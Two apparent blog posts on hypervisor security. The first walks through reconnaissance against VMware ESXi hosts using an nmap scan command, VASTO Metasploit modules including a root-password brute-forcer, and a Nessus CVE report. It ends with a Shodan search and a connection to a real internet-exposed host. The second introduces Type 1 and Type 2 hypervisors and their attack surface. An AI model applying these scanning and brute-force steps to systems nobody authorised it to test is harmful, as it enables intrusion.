There are a number of methods of assessing the security of virtual environments; one of the tools that was recently developed to assist in the evaluation of virtual environments is the VASTO project (Virtualization Assessment Toolkit) (Criscione, et al., 2012). The VASTO project is essentially a collection of Metasploit modules written to query and attack virtual environments, although mainly the VMware platform. The modules are added to the Metasploit project to leveraging an already established and robust framework.

As highlighted earlier, hypervisors are often located on the same subnet as the rest of the servers and, in some cases, the clients. This means that if an attacker is able to gain access to a network that is able to communicate with the hypervisor due to placement or incorrectly configured ACL’s (Access Control Lists), the hypervisor could be attacked directly. Shown in the following example are three simple methods that can be used to locate and query a hypervisor in order to retrieve important information such as version, build number and vulnerabilities that it is susceptible to.

For this demonstration, the author is using a laptop wired into the 192.168.20.0 network in a test environment. Shown in Figure 1, the author uses an NMAP command with the ‘-sV’ switch to scan the entire subnet to return a list of live hosts and associated services. The scan correctly identifies both of the ESXi servers located on the network.

Figure 1- Section of results from an NMAP scan “nmap –sV –T 192.168.20.0/24”

Figure 1- Section of results from an NMAP scan “nmap –sV –T 192.168.20.0/24”

As shown in figure 2 NMAP returns results showing that ESXi is installed on two IP addresses on the 192.168.20.0 subnet and has several open ports. While NMAP does identify the product and version correctly on this occasion, it is not always completely reliable in returning the exact version of the host running on the host. To do this there are a number of methods including VASTO, Nessus or OpenVAS. Using the “vmware_version” module found in VASTO (shown in Figure 2) we are able to detect the exact version of the host including build number.

Figure 2 - Section of results from VASTO vmware_version scan

Figure 2 – Section of results from VASTO vmware_version scan

This now gives the attacker the information needed to locate existing exploits against this version or even develop new exploits, depending on the value of a target. Shown in Figure 4 is a screen shot of a Nessus report generated after a scan against the IP address of the ESXi host. Nessus is an automated scanning and vulnerability assessment tool that fingerprints the host against numerous plugins in order to detect exploits that the host is vulnerable to. While the full report highlighted a number of vulnerabilities found on the host, Figure 3 shows that this particular host is vulnerable to one plugin tested – containing 3 CVE’s (CVE-2012-2448, CVE-2012-2449, CVE-2012-2450).

The number of exploits and risks associated with them is not the area being addressed in this demonstration, but rather the ability to identify the hypervisors and attack it directly. The quantity and complexity of the attacks involved in exploiting type 1 hypervisors is currently much greater than those found on type 2 implementations. As with any technology, as popularity grows and new features are added then the greater the likelihood is that easy to acquire automated attacks will exist.

Figure 3 - Section of Nessus report highlighting highly rates vulnerabilities

Figure 3 – Section of Nessus report highlighting highly rates vulnerabilities

VMware greatly increased the security of their hypervisor through the replacement of their ESX product in favour of adopting the new lightweight (smaller code footprint) ESXi, which did not include their service console within the architecture of the code (VMware, 2012). However there are still elements within the hypervisor that continue to threaten its security. One of these is the notion that ESXi is by default configured to be accessible through a browser. Clients with Port 80 and 443 access to the hosts are able to directly access the hypervisor through a browser and even use the host to download the vSphere management client. While this may be convenient, it is the author’s opinion that this ‘out of the box’ configuration lacks the fundamental security posture that should be taken against such a high value target. An attacker with the vSphere client is able to directly manage the hypervisor once a username and password have been provided. It should also be noted that all ESXi servers (by default) are configured using the ‘root’ account, meaning that the only unknown credential required to manage the host is the root password and it would be possible to ‘brute-force’ this. Furthermore there is a customised brute forcing tool in the VASTO suite called “vmware_login”, which allows automatic dictionary or ‘brute-force’ login attempts.  In addition to all of these vectors, there are also the pertinent issues of existing network security issues such as MITM’s (Man-in-the-middle attack), which could expose these credentials.

To demonstrate the prevalence of exposed hypervisors, using the online search tool ‘Shodan’ (SHODAN, 2012) the author is able to search the internet for exposed ‘ESX’ hosts. In figure 4 we are able to see that Shodan has returned 749 results fitting that description.

Figure 4 - Results of a Shodan search for host containing the term "esx"

Figure 4 – Results of a Shodan search for host containing the term “esx”

While not all of the hosts returned by Shodan are active, a large number of them are still current and allow remote connections to be made over the internet. Shown in figure 5 is a valid connection to one of the returned addresses through a web browser showing an ESXi 5 host.

Figure 5 - Connection to the IP address of one of the hosts found by Shodan

Figure 5 – Connection to the IP address of one of the hosts found by Shodan





Introduction to the hypervisor

22 11 2013

The hypervisor is arguably one of the more misunderstood concepts of virtualization for technical professionals who are more familiar with traditional methods of computing, as it can often be viewed as simply another operating system. While the hypervisor may be a form of operating system, the implications surrounding the impact of a successful exploitation against the system cannot be likened to that of a traditional network operating system. The most obvious element that distinguishes a hypervisor from a traditional operating system is the far reaching implications that vulnerabilities in the hypervisor could have upon the entire system. There are numerous implementations of vendor hypervisors which all have differing levels of vulnerabilities associated. In this post a definition of typical hypervisor implementations is given to establish a baseline of understanding before continuing into the attacks.

In its simplest form, a hypervisor is a piece of code that controls the flow of instructions between guest operating systems and the physical hardware. The hypervisor emulates the physical characteristics of the actual machine such as the processor, RAM, network cards, etc. and presents a homogeneous environment to all the guests.  There are two types of hypervisors – ‘Native’ (also known as ‘Bare Metal’ or Type 1) and ‘Hosted’ (also known as Type 2).

Native hypervisors are installed directly onto the hardware, as would be done with any traditional operating system. There are also implementations of hypervisor that come preinstalled on the host ROM. Native hypervisors benefit from having direct access to the underlying physical hardware of the host, resulting in improved performance. As these systems are not full operating systems they also have the benefit of having a smaller attack surface and are therefore considered more secure.

Hosted hypervisors are installed onto the existing operating system, eg Windows or Linux, which is responsible for communication between the hardware and the hypervisor. This type of hypervisor is less efficient in terms of performance and security and is typically used on desktops rather than servers.

While most common ‘Type 1’ hypervisors are a fraction of the size of a typical desktop operating system – such as Windows 7, the code is still an additional layer of software that is added to the total attack surface of the machine. This underlying dependence, which all hosted machines have on the hypervisor, is one of the most contested factors around virtualisation security ie the ability to compromise the hypervisor and use it to ‘escape’  to other machines hosted on that software.

The security of a Hypervisor is comparable to that of a standard operating system, when considering the size and surface attack area. Systems such as OpenBSD and TrustedBSD allow a greater level of customisation and ability to greatly reduce the features available for a particular task. This lower default functionality offered by systems often has a direct correlation to its security. Hypervisors have typically based their security and efficiency on the amount of Source lines of code (SLOC) used. The core functionally of a hypervisor is to translate and schedule the flow of instructions from the guest to the hardware, anything additional to this could be described as a non-essential feature.

One example of a security focused hypervisor is IBM’s ‘sHype’ implementation of the Xen hypervisor. The total code of this project is claimed to be around 2600 lines in length. It is reported that ESXi and KVM hypervisors were around 200,000 SLOC in 2010 (Steinberg & Kauer, 2010, p. 3), with indications that this could rise and therefore further increasing the attack surface.